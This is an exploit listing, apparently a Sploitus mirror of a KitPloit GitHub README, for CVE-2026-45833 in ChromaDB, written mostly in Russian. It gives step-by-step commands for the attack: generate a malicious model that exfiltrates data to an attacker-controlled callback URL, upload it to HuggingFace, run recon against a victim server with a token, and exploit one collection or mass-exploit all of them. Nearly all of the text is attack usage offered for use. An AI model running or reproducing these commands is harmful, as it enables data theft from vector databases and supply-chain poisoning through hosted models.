Sploitus

Exploit for Project

kitploit · 2026-08-30

Exploit Code

MARKDOWN30 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-E4ZYY-PROJECT-CVE-2026-45833
# Project-CVE-2026-45833

CVE-2026-45833 ChromaDB ДЕЛАЙТЕ НА СВОЙ СТРАХ И РИСК НЕКОТОРЫЙ КОД НУЖНО ИЗМЕНИТЬ.

# 1\. Сгенерировать вредоносную модель

python3 -c " from main import MaliciousModelGenerator gen = MaliciousModelGenerator() gen.generate_model('exfil-model', 'exfil_env', { 'exfil_url': 'http://your-server.com/callback' }) "

# 2\. Загрузить на HuggingFace (вручную или через API)

# 3\. Запустить разведку

python3 main.py --target http://victim:8000   
\--token "eyJ..."   
\--action recon

# 4\. Эксплуатировать конкретную коллекцию

python3 main.py --target http://victim:8000   
\--token "eyJ..."   
\--collection "coll-id-here"   
\--model "your-username/exfil-model"

# 5\. Массовая эксплуатация всех коллекций

python3 main.py --target http://victim:8000   
\--token "eyJ..."   
\--action mass   
\--model "your-username/exfil-model"